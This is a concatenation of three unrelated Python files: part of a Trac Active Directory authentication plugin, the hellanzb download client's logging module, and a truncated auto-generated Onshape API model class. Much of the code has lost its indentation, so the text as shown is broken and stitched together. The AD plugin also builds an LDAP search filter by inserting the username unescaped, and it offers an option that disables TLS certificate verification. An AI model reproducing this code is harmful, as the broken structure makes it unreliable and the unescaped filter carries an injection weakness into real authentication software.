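    #   admin_group = CN=Trac Admins,OU=Groups,DC=example,DC=com
    #   custom_cacertfile = /etc/ssl/certs/example-ca.pem
    #   ignoreunknowncertificate = false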
def __init__(self):
self.ignoreunknowncertificate = self.env.config.getbool('account-manager', 'ignoreunknowncertificate')
# IPasswordStore
def config_key(self):
"""Deprecated"""
def get_users(self, populate_session=True):
"""Grab a list of users from Active Directory"""
lcnx = self._bind_ad()
if lcnx:
if self.auth_group:
userinfo = self.expand_group_users(lcnx, self.auth_group)
else:
users = lcnx.search_s(self.base_dn, ldap.SCOPE_SUBTREE,
"objectCategory=person",
['sAMAccountName', 'mail',
'proxyAddresses', 'displayName'])
userinfo = [self._get_userinfo(u[1]) for u in users]
else:
raise TracError('Unable to bind to Active Directory')
if populate_session:
self._populate_user_session(userinfo)
return [u[0] for u in userinfo]
def expand_group_users(self, cnx, group):
"""Given a group name, enumerate all members"""
g = cnx.search_s(group, ldap.SCOPE_BASE, attrlist=['member'])
        if g and 'member' in g[0][1]:
users = []
for m in g[0][1]['member']:
e = cnx.search_s(m, ldap.SCOPE_BASE)
if e:
if 'person' in e[0][1]['objectClass']:
users.append(self._get_userinfo(e[0][1]))
elif 'group' in e[0][1]['objectClass']:
users.extend(self.expand_group_users(cnx, e[0][0]))
else:
self.log.debug('The group member (%s) is neither a group nor a person' % e[0][0])
else:
self.log.debug('Unable to find user listed in group: %s' % str(m))
                    self.log.debug('This is very strange and you should '
                                   'probably check the consistency of your '
                                   'LDAP directory.')
return users
else:
self.log.debug('Unable to find any members of the group %s' % group)
return []
def has_user(self, user):
users = self.get_users()
return user.lower() in users
def check_password(self, user, password):
"""Checks the password against LDAP"""
dn = self._get_user_dn(user)
success = None
msg = "User Login: %s" % str(user)
if dn:
success = self._bind_ad(dn, password) or False
if success:
msg += " Password Verified"
success = True
elif success is False:
msg += " Password Failed"
else:
msg += " does not exist in AD, deferring authentication"
self.log.debug(msg)
return success
def delete_user(self, user):
"""Can't delete from LDAP"""
self.log.debug("Can not delete users from Active Directory")
return False
# IPermissionUserProvider
def get_permission_action(self, username):
""" Return TRAC_ADMIN if user is in the self.admin_group """
cnx = self._bind_ad()
if cnx and self.admin_group:
users = [u[0] for u in self.expand_group_users(cnx, self.admin_group)]
if username in users:
return ['TRAC_ADMIN']
return []
# Internal methods
def _bind_ad(self, user_dn=None, passwd=None):
user = user_dn or self.bind_dn
password = passwd or self.bind_pw
if not self.ads.lower().startswith('ldap://') and not self.ads.lower().startswith('ldaps://'):
ads = 'ldap://%s' % self.ads
else:
ads = self.ads
try:
#ldaps support
if ads.lower().startswith('ldaps://'):
                if self.ignoreunknowncertificate:
self.log.debug('ignoring unknown certs...')
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
if self.customcacert:
self.log.debug('adding custom cacertfile: %s' % self.customcacert)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,self.customcacert)
l = ldap.initialize(ads)
l.set_option(ldap.OPT_REFERRALS, 0)
except:
raise TracError('Unable to contact Active Directory >>>%s<<<' % ads)
if not user:
raise TracError('The bind_dn ini option must be set')
if not password:
raise TracError('The bind_pw ini option must be set')
try:
l.simple_bind_s(user, password)
except Exception, e:
self.log.debug('Unable to bind to Active Directory', exc_info=e)
return None
return l
def _get_user_dn(self, user):
if self.has_user(user):
lcnx = self._bind_ad()
if lcnx:
try:
u = lcnx.search_s(self.base_dn, ldap.SCOPE_SUBTREE, "(&(objectCategory=person)(sAMAccountName=%s))" % user, ['sAMAccountName'])
return u[0][0]
except Exception, e:
self.log.debug('user not found: %s' % user, exc_info=e)
return None
else:
raise TracError('Unable to bind to Active Directory')
return None
def _get_userinfo(self, attrs):
""" Extract the userinfo tuple from the LDAP search result """
username = attrs['sAMAccountName'][0].lower()
displayname = attrs.get('displayName', [''])[0]
email = ''
if 'mail' in attrs:
email = attrs['mail'][0].lower()
elif 'proxyAddresses' in attrs:
            for e in attrs['proxyAddresses']:
                # the uppercase 'SMTP:' prefix marks the primary address
                if e.startswith('SMTP:'):
                    email = e[5:]
                    break
return (username, displayname, email)
def _populate_user_session(self, userinfo):
""" Create user session entries and populate email and last visit """
# Kind of ugly. First try to insert a new session record. If it
# fails, don't worry, means it's already there. Second, insert the
# email address session attribute. If it fails, don't worry, it's
# already there.
cnx = self.env.get_db_cnx()
lastvisit = 0
for uname, displayname, email in userinfo:
try:
cur = cnx.cursor()
cur.execute('INSERT INTO session (sid, authenticated, '
'last_visit) VALUES (%s, 1, %s)',
(uname, lastvisit))
cnx.commit()
except:
cnx.rollback()
if email:
try:
cur = cnx.cursor()
cur.execute("INSERT INTO session_attribute"
" (sid, authenticated, name, value)"
" VALUES (%s, 1, 'email', %s)",
(uname, email))
cnx.commit()
except:
cnx.rollback()
if displayname:
try:
cur = cnx.cursor()
cur.execute("INSERT INTO session_attribute"
" (sid, authenticated, name, value)"
" VALUES (%s, 1, 'name', %s)",
(uname, displayname))
cnx.commit()
except:
cnx.rollback()
cnx.close()
|
|
"""
Logging - hellanzb's logging facility. Ties in with python's logging system, with an added
SCROLL log level.
The NZBLeecherTicker object constantly prints new lines of text to the screen and kills its
old ones via the scroll() level. This keeps the screen busy, but the SCROLL level hooks allow
normal logging of non-SCROLL messages by passing them to NZBLeecherTicker to be handled
specially (printed above the scrolling text). This special handling is only enabled when
SCROLL has been turned on (via scrollBegin())
(c) Copyright 2005 Philip Jenvey
[See end of file]
"""
import heapq, logging, os, re, sys, thread, types  # re is used by NEWLINE_RE below
try:
import termios
except ImportError:
termios = None
from logging import StreamHandler
from logging.handlers import RotatingFileHandler
from threading import Condition, Lock, RLock, Thread
from twisted.internet import reactor
from twisted.python import reflect, util
from twisted.python.log import startLoggingWithObserver, FileLogObserver
from Hellanzb.Util import *
__id__ = '$Id$'
class StreamHandlerNoLF(StreamHandler):
""" A StreamHandler that doesn't append \n to every message logged to it """
def emit(self, record):
""" Cut/Pastse of StreamHandler's emit to not append messages with \n """
try:
msg = self.format(record)
if not hasattr(types, "UnicodeType"): #if no unicode support...
self.stream.write("%s" % msg)
else:
try:
self.stream.write("%s" % msg)
except UnicodeError:
self.stream.write("%s" % msg.encode("UTF-8"))
self.flush()
except:
self.handleError(record)
class RotatingFileHandlerNoLF(RotatingFileHandler, StreamHandlerNoLF):
""" A RotatingFileHandler that doesn't append \n to every message logged to it """
def emit(self, record):
""" Cut/Pastse of RotatingFileHandler's emit to not append messages with \n """
if self.maxBytes > 0: # are we rolling over?
msg = "%s" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
self.doRollover()
StreamHandlerNoLF.emit(self, record)
class ScrollableHandler(StreamHandlerNoLF):
""" ScrollableHandler is a StreamHandler that specially handles scrolling (log
messages at the SCROLL level). It allows you to temporarily interrupt the constant
scroll with other log messages of different levels (printed at the top of the scroll
area) """
    # custom log levels (class vars); SCROLL is the scrolling ticker level
LOGFILE = 11
SCROLL = 12
SHUTDOWN = 13
NOLOGFILE = 14
def __init__(self, *args, **kwargs):
self.scrollLock = RLock()
self.scrollFlag = False
StreamHandlerNoLF.__init__(self, *args, **kwargs)
def handle(self, record):
""" The 'scroll' level is a constant scroll that can be interrupted. This interruption is
done via prepending text to the scroll area """
rv = self.filter(record)
if rv:
if record.levelno == ScrollableHandler.SCROLL:
self.emitSynchronized(record)
elif record.levelno == ScrollableHandler.SHUTDOWN:
record.msg = '\n\n\n%s\n' % record.msg
self.emitSynchronized(record)
else:
self.scrollLock.acquire()
# If scroll is on, interrupt scroll
if ScrollableHandler.scrollFlag:
self.scrollHeader(record)
else:
# otherwise if scroll isn't on, just log the message normally
self.emitSynchronized(record)
self.scrollLock.release()
return rv
def emitSynchronized(self, record):
""" Write a log message atomically. Normal python logging Handler behavior """
self.acquire()
try:
self.emit(record)
finally:
self.release()
def scrollHeader(self, record):
""" Print a log message so that the user can see it during a SCROLL """
msg = self.format(record).rstrip() # Scroller appends newline for us
from twisted.internet import reactor
if inMainThread():
# FIXME: scrollBegin() should really be creating the scroller instance
# FIXME: no unicode crap from normal python log emit
Hellanzb.scroller.scrollHeader(msg)
else:
reactor.callFromThread(Hellanzb.scroller.scrollHeader, msg)
class RecentLogEntries:
""" A FIFO queue that maintains the specified size by popping off the least recently added
item """
def __init__(self, size):
self.size = size
self.logEntries = []
def append(self, level, logEntry):
if len(self.logEntries) >= self.size:
self.logEntries.pop(0)
self.logEntries.append((level, logEntry))
    def __iter__(self):
        # iterate over a snapshot so appends during iteration don't bite us
        return iter(self.logEntries[:])
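
# A quick sketch of the FIFO eviction (illustrative): with size 2, the oldest
# entry is dropped on overflow.
#
#   recent = RecentLogEntries(2)
#   recent.append(logging.INFO, 'a')
#   recent.append(logging.INFO, 'b')
#   recent.append(logging.INFO, 'c')
#   list(recent)  ->  [(logging.INFO, 'b'), (logging.INFO, 'c')]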
class LogOutputStream:
""" Provides somewhat of a file-like interface (supporting only the typical writing
functions) to the specified logging function """
def __init__(self, logFunction):
self.write = logFunction
def flush(self): pass
def close(self): pass
def isatty(self): raise NotImplementedError()
def next(self): raise NotImplementedError()
def read(self, n = -1): raise NotImplementedError()
def readline(self, length = None): raise NotImplementedError()
def readlines(self, sizehint = 0): raise NotImplementedError()
def seek(self, pos, mode = 0): raise NotImplementedError()
def tell(self): raise NotImplementedError()
def truncate(self, size = None): raise NotImplementedError()
def writelines(self, list): raise NotImplementedError()
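
# Typical use (sketch): wrap a logging function so code that expects a
# file-like object writes into the logging system instead, e.g.
#
#   from Hellanzb.Log import debug
#   sys.stdout = LogOutputStream(debug)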
class ANSICodes(object):
# f/b_ = fore/background
# d/l/b = dark/light/bright
map = {
'ESCAPE': '\033',
'RESET': '0',
'KILL_LINE': 'K',
'F_DRED': '31',
'F_LRED': '31;1',
'F_DGREEN': '32',
'F_LGREEN': '32;1',
'F_BROWN': '33',
'F_YELLOW': '33;1',
'F_DBLUE': '34',
'F_LBLUE': '34;1',
'F_DMAGENTA': '35',
'F_LMAGENTA': '35;1',
'F_DCYAN': '36',
'F_LCYAN': '36;1',
'F_WHITE': '37',
'F_BWHITE': '37;1',
}
def __init__(self):
for key, val in self.map.iteritems():
if Hellanzb.DISABLE_ANSI:
code = ''
else:
code = self.code(key)
self.__dict__[key] = code
def code(self, name):
val = self.map[name]
if name != 'ESCAPE':
val = '%s[%s' % (self.map['ESCAPE'], val)
if name != 'KILL_LINE':
val = '%sm' % val
return val
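
    # For example, with ANSI enabled: code('F_DRED') returns '\033[31m' and
    # code('KILL_LINE') returns '\033[K'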
def moveUp(self, count):
""" Return ANSI codes to move the cursor up count lines """
return not Hellanzb.DISABLE_ANSI and '\r\033[%iA' % count or ''
class HellaTwistedLogObserver(FileLogObserver):
""" Custom twisted LogObserver. It emits twisted log entries to the debug log
function, unless they are failures (Exceptions), which are emited to the error log
function """
def __init__(self):
from Hellanzb.Log import error, debug
self.error = error
self.debug = debug
def emit(self, eventDict):
isFailure = False
edm = eventDict['message']
if not edm:
            if eventDict['isError'] and 'failure' in eventDict:
isFailure = True
text = ((eventDict.get('why') or 'Unhandled Error')
+ '\n' + eventDict['failure'].getTraceback())
            elif 'format' in eventDict:
text = self._safeFormat(eventDict['format'], eventDict)
else:
# we don't know how to log this
return
else:
text = ' '.join(map(reflect.safe_str, edm))
fmtDict = {'system': eventDict['system'], 'text': text}
msgStr = self._safeFormat("[%(system)s] %(text)s\n", fmtDict)
util.untilConcludes(self.debug, msgStr, appendLF=False)
if isFailure:
util.untilConcludes(self.error, msgStr, appendLF=False)
__call__ = emit
NEWLINE_RE = re.compile('\n')
class NZBLeecherTicker:
""" A basic logger for NZBLeecher. It's uh, not what I really want. I'd rather put more
time into writing a curses interface. Code submissions greatly appreciated. -pjenvey
"""
def __init__(self):
self.size = 0
self.segments = []
self.connectionCounts = {}
self.currentLog = None
self.maxCount = 0 # FIXME: var name
ACODE = Hellanzb.ACODE
self.connectionPrefix = ACODE.F_DBLUE + '[' + ACODE.RESET + '%s' + \
ACODE.F_DBLUE + ']' + ACODE.RESET
self.scrollHeaders = []
self.started = False
self.killedHistory = False
from Hellanzb.Log import scroll
self.logger = scroll
def addClient(self, segment, color):
""" Add a client (it's segment) to the ticker, to log with the specified ascii color code """
heapq.heappush(self.segments, (segment.priority, segment, color))
def removeClient(self, segment, color):
""" Remove a client (it's segment) from the ticker """
self.segments.remove((segment.priority, segment, color))
def setConnectionCount(self, color, count):
""" Set the number of connections for the particular color """
if color not in self.connectionCounts:
self.connectionCounts[color] = count
else:
self.connectionCounts[color] += count
def scrollHeader(self, message):
# Even if passed multiple lines, ensure all lines are max 80 chars
lines = message.split('\n')
for line in lines:
line = truncateToMultiLine(line, length = 80).expandtabs()
self.scrollHeaders.append(line)
if Hellanzb.SHUTDOWN:
return
self.updateLog()
def killHistory(self):
""" clear scroll off the screen """
if not self.killedHistory and self.started:
msg = Hellanzb.ACODE.moveUp(self.maxCount + 1)
for i in range(self.maxCount + 1):
msg = '%s\n%s' % (msg, Hellanzb.ACODE.KILL_LINE)
msg = '%s%s' % (msg, Hellanzb.ACODE.moveUp(self.maxCount + 1))
if not Hellanzb.DAEMONIZE:
self.logger(msg)
self.killedHistory = True
self.started = False
# segments should be empty at this point anyway
self.segments = []
# FIXME: probably doesn't matter much, but should be using StringIO for concatenation
# here, anyway
def updateLog(self):
""" Log ticker """
if Hellanzb.DAEMONIZE or Hellanzb.DISABLE_SCROLLER:
return
ACODE = Hellanzb.ACODE
        if self.currentLog is not None:
# Kill previous lines,
if Hellanzb.DISABLE_ANSI:
currentLog = '\n'
else:
currentLog = Hellanzb.ACODE.moveUp(self.maxCount)
else:
            # unless we have just begun logging, in which case we explicitly
            # log the first message
currentLog = ''
# Log information we want to prefix the scroll (so it stays on the screen)
if len(self.scrollHeaders) > 0:
scrollHeader = ''
for message in self.scrollHeaders:
message = NEWLINE_RE.sub(ACODE.KILL_LINE + '\n', message)
scrollHeader = '%s%s%s\n' % (scrollHeader, message, ACODE.KILL_LINE)
currentLog = '%s%s' % (currentLog, scrollHeader)
# listing sorted via heapq
heap = self.segments[:]
sortedSegments = []
colorCount = self.connectionCounts.copy()
try:
while True:
p, segment, color = heapq.heappop(heap)
colorCount[color] -= 1
sortedSegments.append((segment, color))
except IndexError:
pass
lastSegment = None
i = 0
for segment, color in sortedSegments:
i += 1
if self.maxCount > 9:
prettyId = str(i).zfill(2)
else:
prettyId = str(i)
# Determine when we've just found the real file name, then use that as the
# show name
try:
                if segment.nzbFile.showFilenameIsTemp and segment.nzbFile.filename is not None:
segment.nzbFile.showFilename = segment.nzbFile.filename
segment.nzbFile.showFilenameIsTemp = False
except AttributeError, ae:
from Hellanzb.Log import debug
debug('ATTRIBUTE ERROR: ' + str(ae) + ' num: ' + str(segment.number) + \
' duh: ' + str(segment.articleData))
connectionPrefix = color + '[' + ACODE.RESET + '%s' + \
color + ']' + ACODE.RESET
prefix = connectionPrefix % prettyId
            if lastSegment is not None and lastSegment.nzbFile == segment.nzbFile:
# 57 line width -- approximately 80 - 5 (prefix) - 18 (max suffix)
currentLog = '%s%s %s%s' % (currentLog, prefix,
rtruncate(segment.nzbFile.showFilename,
length = 57), ACODE.KILL_LINE)
else:
currentLog = '%s%s %s - %s%2d%%%s%s @ %s%s%.1fKB/s%s' % \
(currentLog, prefix, rtruncate(segment.nzbFile.showFilename,
length = 57), ACODE.F_DGREEN,
segment.nzbFile.downloadPercentage, ACODE.RESET, ACODE.F_DBLUE,
ACODE.RESET, ACODE.F_DRED, segment.nzbFile.getCurrentRate(),
ACODE.KILL_LINE)
currentLog = '%s\n' % currentLog
lastSegment = segment
# Fill in empty lines
for color, fillCount in colorCount.iteritems():
for count in range(fillCount):
i += 1
fill = i
if self.maxCount > 9:
prettyId = str(fill).zfill(2)
else:
prettyId = str(fill)
connectionPrefix = color + '[' + ACODE.RESET + '%s' + \
color + ']' + ACODE.RESET
prefix = connectionPrefix % prettyId
currentLog = '%s%s%s\n' % (currentLog, prefix, ACODE.KILL_LINE)
paused = ''
if Hellanzb.downloadPaused:
paused = '%s [Paused]%s' % (ACODE.F_DCYAN, ACODE.RESET)
totalSpeed = Hellanzb.getCurrentRate()
if totalSpeed == 0:
eta = '00:00:00'
else:
eta = prettyEta((Hellanzb.queue.totalQueuedBytes / 1024) / totalSpeed)
prefix = self.connectionPrefix % 'Total'
currentLog = '%s%s%s %.1fKB/s%s, %s%i MB%s queued, ETA: %s%s%s%s%s' % \
(currentLog, prefix, ACODE.F_DRED, totalSpeed, ACODE.RESET,
ACODE.F_DGREEN, Hellanzb.queue.totalQueuedBytes / 1024 / 1024, ACODE.RESET,
ACODE.F_YELLOW, eta, ACODE.RESET, paused, ACODE.KILL_LINE)
self.logger(currentLog)
self.currentLog = currentLog
self.scrollHeaders = []
def stdinEchoOff():
""" ECHO OFF standard input """
if not termios or Hellanzb.DAEMONIZE or Hellanzb.DISABLE_SCROLLER:
return
from Hellanzb.Log import debug
try:
fd = sys.stdin.fileno()
except:
return
try:
new = termios.tcgetattr(fd)
except Exception, e:
        debug('stdinEchoOff error', e)
return
new[3] = new[3] & ~termios.ECHO # 3 == 'lflags'
try:
termios.tcsetattr(fd, termios.TCSADRAIN, new)
debug('stdinEchoOff - OFF')
except Exception, e:
debug('stdinEchoOff error', e)
def stdinEchoOn():
""" ECHO ON standard input """
if not termios or getattr(Hellanzb, 'DAEMONIZE', False) \
or getattr(Hellanzb, 'DISABLE_SCROLLER', False):
return
from Hellanzb.Log import debug
try:
fd = sys.stdin.fileno()
except:
return
try:
new = termios.tcgetattr(fd)
except Exception, e:
debug('stdinEchoOn error', e)
return
new[3] = new[3] | termios.ECHO # 3 == 'lflags'
try:
termios.tcsetattr(fd, termios.TCSAFLUSH, new)
debug('stdinEchoOn - ON')
except Exception, e:
debug('stdinEchoOn error', e)
def prettyException(exception):
""" Return a pretty rendition of the specified exception, or if no valid exception an
empty string """
message = ''
    if exception is not None:
if isinstance(exception, Exception):
message += getLocalClassName(exception.__class__) + ': ' + str(exception)
if not isinstance(exception, FatalError):
# Unknown/unexpected exception -- also show the stack trace
stackTrace = StringIO()
print_exc(file=stackTrace)
stackTrace = stackTrace.getvalue()
message = '%s\n%s' % (message, stackTrace)
return message
def lockScrollableHandlers(func, *args, **kwargs):
""" Call the function with all ScrollableHandlers locked """
lockedLoggers = []
for logger in Hellanzb.logger.handlers:
if isinstance(logger, ScrollableHandler):
logger.scrollLock.acquire()
lockedLoggers.append(logger)
    try:
        func(*args, **kwargs)
    finally:
        # release the locks even if func raised
        for logger in lockedLoggers:
            logger.scrollLock.release()
def initLogging():
""" Setup logging """
logging.addLevelName(ScrollableHandler.LOGFILE, 'LOGFILE')
logging.addLevelName(ScrollableHandler.SCROLL, 'SCROLL')
logging.addLevelName(ScrollableHandler.SHUTDOWN, 'SHUTDOWN')
logging.addLevelName(ScrollableHandler.NOLOGFILE, 'NOLOGFILE')
Hellanzb.logger = logging.getLogger('hellanzb')
#Hellanzb.logger.setLevel(ScrollableHandler.SCROLL)
Hellanzb.logger.setLevel(logging.DEBUG)
# Filter for stdout -- log warning and below
class OutFilter(logging.Filter):
def filter(self, record):
if record.levelno > logging.WARNING:
return False
            # DEBUG will only go out to its log file
elif record.levelno == logging.DEBUG:
return False
return True
outHdlr = ScrollableHandler(sys.stdout)
outHdlr.setLevel(ScrollableHandler.SCROLL)
outHdlr.addFilter(OutFilter())
Hellanzb.logger.addHandler(outHdlr)
errHdlr = ScrollableHandler(sys.stderr)
errHdlr.setLevel(logging.ERROR)
Hellanzb.logger.addHandler(errHdlr)
# Whether or not scroll mode is on
ScrollableHandler.scrollFlag = False
# Whether or not the scroller functionality is completely disabled
Hellanzb.DISABLE_SCROLLER = False
Hellanzb.recentLogs = RecentLogEntries(20)
def initLogFile(logFile = None, debugLogFile = None):
""" Initialize the log file. This has to be done after the config is loaded """
# map of ascii colors. for the kids
# This is initialized here, instead of initLogging, because it requires the config
# file to be loaded
Hellanzb.ACODE = ANSICodes()
maxBytes = backupCount = 0
if hasattr(Hellanzb, 'LOG_FILE_MAX_BYTES'):
maxBytes = unPrettyBytes(Hellanzb.LOG_FILE_MAX_BYTES)
if hasattr(Hellanzb, 'LOG_FILE_BACKUP_COUNT'):
backupCount = Hellanzb.LOG_FILE_BACKUP_COUNT
class LogFileFilter(logging.Filter):
def filter(self, record):
            # SCROLL doesn't belong in log files and DEBUG will have its own log file
if record.levelno == ScrollableHandler.SCROLL or record.levelno == logging.DEBUG \
or record.levelno == ScrollableHandler.NOLOGFILE:
return False
return True
# FIXME: should check if Hellanzb.LOG_FILE is set first
if logFile is not None:
Hellanzb.LOG_FILE = os.path.abspath(logFile)
if debugLogFile is not None:
Hellanzb.DEBUG_MODE = os.path.abspath(debugLogFile)
        # Set this, maybe again, in case the -d option was specified
Hellanzb.DEBUG_MODE_ENABLED = True
# Ensure the log file's parent dirs exist and are writable
dirNames = {}
if hasattr(Hellanzb, 'LOG_FILE') and Hellanzb.LOG_FILE is not None:
dirNames['LOG_FILE'] = os.path.dirname(Hellanzb.LOG_FILE)
if hasattr(Hellanzb, 'DEBUG_MODE') and Hellanzb.DEBUG_MODE is not None:
dirNames['DEBUG_MODE'] = os.path.dirname(Hellanzb.DEBUG_MODE)
ensureDirs(dirNames)
if isPy2App():
Hellanzb.DISABLE_SCROLLER = True
if Hellanzb.LOG_FILE:
fileHdlr = RotatingFileHandlerNoLF(Hellanzb.LOG_FILE, maxBytes = maxBytes,
backupCount = backupCount)
fileHdlr.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
fileHdlr.addFilter(LogFileFilter())
Hellanzb.logger.addHandler(fileHdlr)
if Hellanzb.DEBUG_MODE_ENABLED:
class DebugFileFilter(logging.Filter):
def filter(self, record):
if record.levelno > logging.DEBUG or record.levelno == ScrollableHandler.NOLOGFILE:
return False
return True
debugFileHdlr = RotatingFileHandlerNoLF(Hellanzb.DEBUG_MODE, maxBytes = maxBytes,
backupCount = backupCount)
debugFileHdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
debugFileHdlr.setLevel(logging.DEBUG)
debugFileHdlr.addFilter(DebugFileFilter())
Hellanzb.logger.addHandler(debugFileHdlr)
# Direct twisted log output via the custom LogObserver
startLoggingWithObserver(HellaTwistedLogObserver())
"""
Copyright (c) 2005 Philip Jenvey <pjenvey@groovie.org>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author or contributors may not be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
$Id$
"""
|
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_annotation231
except ImportError:
btp_annotation231 = sys.modules["onshape_client.oas.models.btp_annotation231"]
try:
from onshape_client.oas.models import btp_expression9
except ImportError:
btp_expression9 = sys.modules["onshape_client.oas.models.btp_expression9"]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
try:
from onshape_client.oas.models import btp_statement269
except ImportError:
btp_statement269 = sys.modules["onshape_client.oas.models.btp_statement269"]
try:
from onshape_client.oas.models import btp_statement_expression275_all_of
except ImportError:
btp_statement_expression275_all_of = sys.modules[
"onshape_client.oas.models.btp_statement_expression275_all_of"
]
class BTPStatementExpression275(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
            and for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
            and for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("documentation_type",): {
"FUNCTION": "FUNCTION",
"PREDICATE": "PREDICATE",
"CONSTANT": "CONSTANT",
"ENUM": "ENUM",
"USER_TYPE": "USER_TYPE",
"FEATURE_DEFINITION": "FEATURE_DEFINITION",
"FILE_HEADER": "FILE_HEADER",
"UNDOCUMENTABLE": "UNDOCUMENTABLE",
"UNKNOWN": "UNKNOWN",
},
}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"expression": (btp_expression9.BTPExpression9,), # noqa: E501
"atomic": (bool,), # noqa: E501
"documentation_type": (str,), # noqa: E501
"end_source_location": (int,), # noqa: E501
"node_id": (str,), # noqa: E501
"short_descriptor": (str,), # noqa: E501
"space_after": (btp_space10.BTPSpace10,), # noqa: E501
"space_before": (btp_space10.BTPSpace10,), # noqa: E501
"space_default": (bool,), # noqa: E501
"start_source_location": (int,), # noqa: E501
"annotation": (btp_annotation231.BTPAnnotation231,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"expression": "expression", # noqa: E501
"atomic": "atomic", # noqa: E501
"documentation_type": "documentationType", # noqa: E501
"end_source_location": "endSourceLocation", # noqa: E501
"node_id": "nodeId", # noqa: E501
"short_descriptor": "shortDescriptor", # noqa: E501
"space_after": "spaceAfter", # noqa: E501
"space_before": "spaceBefore", # noqa: E501
"space_default": "spaceDefault", # noqa: E501
"start_source_location": "startSourceLocation", # noqa: E501
"annotation": "annotation", # noqa: E501
}
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
"_composed_instances",
"_var_name_to_model_instances",
"_additional_properties_model_instances",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_statement_expression275.BTPStatementExpression275 - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
expression (btp_expression9.BTPExpression9): [optional] # noqa: E501
atomic (bool): [optional] # noqa: E501
documentation_type (str): [optional] # noqa: E501
end_source_location (int): [optional] # noqa: E501
node_id (str): [optional] # noqa: E501
short_descriptor (str): [optional] # noqa: E501
space_after (btp_space10.BTPSpace10): [optional] # noqa: E501
space_before (btp_space10.BTPSpace10): [optional] # noqa: E501
space_default (bool): [optional] # noqa: E501
start_source_location (int): [optional] # noqa: E501
annotation (btp_annotation231.BTPAnnotation231): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
constant_args = {
"_check_type": _check_type,
"_path_to_item": _path_to_item,
"_from_server": _from_server,
"_configuration": _configuration,
}
required_args = {}
# remove args whose value is Null because they are unset
required_arg_names = list(required_args.keys())
for required_arg_name in required_arg_names:
if required_args[required_arg_name] is nulltype.Null:
del required_args[required_arg_name]
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in six.iteritems(kwargs):
if (
var_name in unused_args
and self._configuration is not None
and self._configuration.discard_unknown_keys
and not self._additional_properties_model_instances
):
# discard variable.
continue
setattr(self, var_name, var_value)
@staticmethod
def _composed_schemas():
# we need this here to make our import statements work
